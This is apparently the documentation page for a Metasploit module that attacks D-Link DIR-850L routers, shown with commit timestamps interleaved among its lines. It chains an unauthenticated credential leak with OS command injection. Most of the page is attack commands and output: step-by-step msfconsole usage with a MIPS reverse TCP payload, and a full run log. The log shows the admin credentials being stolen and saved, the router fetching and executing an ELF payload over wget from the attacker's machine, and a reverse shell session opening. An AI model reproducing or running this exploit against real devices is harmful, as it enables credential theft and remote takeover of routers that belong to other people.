2017-11-10 18:15:22 -06:00
The module dlink_dir850_(un)auth_exec leverages an unauthenticated credential disclosure vulnerability to then execute arbitrary commands via an authenticated OS command injection
vulnerability. D-LINK 850L (excluding "Cloud" models) devices with firmware version up to 1.14B07
are potentially vulnerable. The vulnerability seems to occur within the parsing of the config. Another PoC can be found here https://www.seebug.org/vuldb/ssvid-96333. Setting command to be `reboot` will force the router into an infinite loop.
2017-11-02 15:54:45 -04:00
## Vulnerable Application
1. Start msfconsole
2. Do : `use exploit/linux/http/dlink_dir850l_unauth_exec.rb`
3. Do : `set RHOST [RouterIP]`
2017-11-04 11:40:32 -04:00
4. Do : `set PAYLOAD linux/mipsbe/shell/reverse_tcp`
2017-11-02 15:54:45 -04:00
5. Do : `run`
6. If router is vulnerable, payload should be dropped via wget and executed, and therein should obtain an session
## Example
```
2017-11-03 09:09:51 -04:00
msf > use exploit/linux/http/dlink_dir850l_unauth_exec
2017-11-04 11:40:32 -04:00
msf exploit(dlink_dir850l_unauth_exec) > set RHOST 192.168.0.14
2017-11-02 15:54:45 -04:00
RHOST => 192.168.0.14
2017-11-04 11:40:32 -04:00
msf exploit(dlink_dir850l_unauth_exec) > set RPORT 80
2017-11-02 15:54:45 -04:00
RPORT => 80
2017-11-04 11:40:32 -04:00
msf exploit(dlink_dir850l_unauth_exec) > check
[*] 192.168.0.14:80 The target service is running, but could not be validated.
msf exploit(dlink_dir850l_unauth_exec) > set VERBOSE true
VERBOSE => true
msf exploit(dlink_dir850l_unauth_exec) > set LHOST ens3
2017-11-02 15:54:45 -04:00
LHOST => ens3
2017-11-04 11:40:32 -04:00
msf exploit(dlink_dir850l_unauth_exec) > set LPORT 3131
LPORT => 3131
msf exploit(dlink_dir850l_unauth_exec) > run
2017-11-02 15:54:45 -04:00
2017-11-04 11:40:32 -04:00
[*] Started reverse TCP handler on 192.168.0.11:3131
[*] 192.168.0.14:80 - Connecting to target...
[+] 192.168.0.14:80 - Retrieved the username/password combo Admin/92830535
[+] 192.168.0.14:80 - Downloaded credentials to /root/.msf4/loot/20171104113614_default_192.168.0.14_dlink.dir850l.lo_146186.txt
[*] 192.168.0.14:80 - Starting up web service http://192.168.0.11:8080/ZUrlVeWUm
[*] Using URL: http://0.0.0.0:8080/ZUrlVeWUm
[*] Local IP: http://192.168.0.11:8080/ZUrlVeWUm
[*] 192.168.0.14:80 - Asking target to request to download http://192.168.0.11:8080/ZUrlVeWUm
2017-11-03 09:09:51 -04:00
[*] 192.168.0.14:80 - Waiting for target to request the ELF payload...
[*] 192.168.0.14:80 - Sending payload to the server...
2017-11-04 11:40:32 -04:00
[*] 192.168.0.14:80 - Requesting device to chmod ZUrlVeWUm
[*] 192.168.0.14:80 - Requesting device to execute ZUrlVeWUm
[*] 192.168.0.14:80 - Waiting 10 seconds for shell to connect back to us...
2017-11-03 09:09:51 -04:00
[*] Sending stage (84 bytes) to 192.168.0.14
2017-11-04 11:40:32 -04:00
[*] Command shell session 1 opened (192.168.0.11:3131 -> 192.168.0.14:43953) at 2017-11-04 11:36:26 -0400
[+] Deleted /tmp/uoskutcy
[-] Exploit aborted due to failure: unknown: 192.168.0.14:80 - Shell never connected to us!, disconnect?
[*] Server stopped.
[*] Exploit completed, but no session was created.
msf exploit(dlink_dir850l_unauth_exec) > sessions -i 1
2017-11-03 09:09:51 -04:00
[*] Starting interaction with 1...
2017-11-04 11:40:32 -04:00
190745749
wUVNdEKSrgeaxdSQyfTyxvaoYgFzyvGj
2017-11-03 09:09:51 -04:00
true
2017-11-04 11:40:32 -04:00
pQfaUhhwMvgnWrLpQXhhUAioNBFHPRZP
OgkEaOTPYbUEOLlLpLFEbodBvHFmVRmH
iNaYBrmsZqFyolPWWRKEHsKglrSlSGkY
2017-11-03 09:09:51 -04:00
pwd
/
2017-11-02 15:54:45 -04:00
```
